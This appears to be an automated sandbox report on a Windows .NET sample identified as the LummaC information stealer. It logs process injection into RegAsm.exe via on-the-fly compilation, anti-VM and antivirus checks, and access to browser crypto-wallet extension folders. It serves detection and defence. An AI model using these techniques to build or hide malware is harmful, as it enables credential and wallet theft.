YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/7@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00437A60 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

5_2_00437A60

Source: C:\Users\user\Desktop\EBUdultKh7.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EBUdultKh7.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03

Source: C:\Users\user\Desktop\EBUdultKh7.exe

File created: C:\Users\user\AppData\Local\Temp\ypmbwesq

Jump to behavior

Source: EBUdultKh7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: EBUdultKh7.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: EBUdultKh7.exe	Virustotal: Detection: 64%
Source: EBUdultKh7.exe	ReversingLabs: Detection: 87%

Source: unknown	Process created: C:\Users\user\Desktop\EBUdultKh7.exe "C:\Users\user\Desktop\EBUdultKh7.exe"
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F80.tmp" "c:\Users\user\AppData\Local\Temp\ypmbwesq\CSC8091DC6DAAC840838D6B58938AE1A03F.TMP"
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F80.tmp" "c:\Users\user\AppData\Local\Temp\ypmbwesq\CSC8091DC6DAAC840838D6B58938AE1A03F.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: EBUdultKh7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: EBUdultKh7.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: EBUdultKh7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.pdb source: EBUdultKh7.exe, 00000000.00000002.1415544553.00000000016DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: q8C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.pdb source: EBUdultKh7.exe, 00000000.00000002.1416375255.0000000003304000.00000004.00000800.00020000.00000000.sdmp

Source: EBUdultKh7.exe

Static PE information: 0xEC1D1ADB [Tue Jul 12 17:33:15 2095 UTC]

Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline"
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004447F8 push ecx; retf 0040h

5_2_004447F9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll

Jump to dropped file

Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: EBUdultKh7.exe PID: 7492, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory allocated: 3260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory allocated: 5260000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll

Jump to dropped file

Source: C:\Users\user\Desktop\EBUdultKh7.exe TID: 7540	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7704	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: RegAsm.exe, 00000005.00000002.1623376663.0000000001255000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1623376663.000000000128D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: EBUdultKh7.exe, 00000000.00000002.1415544553.0000000001672000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0043CBA0 LdrInitializeThunk,

5_2_0043CBA0

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.EBUdultKh7.exe.62d0000.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 0.2.EBUdultKh7.exe.62d0000.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 0.2.EBUdultKh7.exe.62d0000.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Compiles code for process injection (via .Net compiler)

Source: C:\Users\user\Desktop\EBUdultKh7.exe

File written: C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 441000	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 455000	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EA5008	Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\EBUdultKh7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F80.tmp" "c:\Users\user\AppData\Local\Temp\ypmbwesq\CSC8091DC6DAAC840838D6B58938AE1A03F.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe	Queries volume information: C:\Users\user\Desktop\EBUdultKh7.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\EBUdultKh7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
